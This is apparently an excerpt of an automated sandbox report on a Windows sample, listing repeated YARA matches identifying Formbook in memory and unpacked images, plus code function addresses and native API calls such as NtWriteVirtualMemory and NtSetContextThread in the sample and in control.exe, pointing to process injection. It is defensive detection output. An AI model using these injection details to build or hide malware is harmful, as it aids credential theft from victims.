          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5tCYPTkM6b.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5tCYPTkM6b.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5tCYPTkM6b.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.5tCYPTkM6b.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5tCYPTkM6b.exe.2300000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332468083.0000000000910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.267961814.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.522721651.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.305802792.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.523572429.0000000000730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332146326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.332417748.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.523718617.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.266985950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.319162171.000000000F609000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.270764951.0000000002300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 0_2_0040604C
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 0_2_00404772
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 0_2_021E0A3A
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00401030
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_0041C8C5
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_0041B8F3
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_0041C134
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_0041D2AE
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00408C8B
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00408C90
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00402D90
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_0041CF5F
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009DB090
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A81002
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009CF900
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009E4120
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009FEBB0
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009C0D20
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A91D55
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_009E6E30
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0441D466
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0436841F
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04350D20
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04421D55
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04422D07
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_044225DD
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04382581
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0436D5E0
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04376E30
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0441D616
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04422EF7
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04421FF1
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04411002
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_043820A0
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0436B090
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_044228EC
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_044220A8
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04374120
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0435F900
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_044222AE
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_04422B28
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0438EBB0
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_0441DBD2
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_001EC8C5
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_001D8C90
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_001D8C8B
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_001D2D90
          Source: C:\Windows\SysWOW64\control.exe; Code function: 14_2_001D2FB0
          Source: C:\Windows\SysWOW64\control.exe; Code function: String function: 0435B150 appears 35 times
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_004185EA NtCreateFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\5tCYPTkM6b.exe; Code function: 2_2_00A0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399560 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_0439B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_043999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 14_2_04399A10 NtQuerySection,
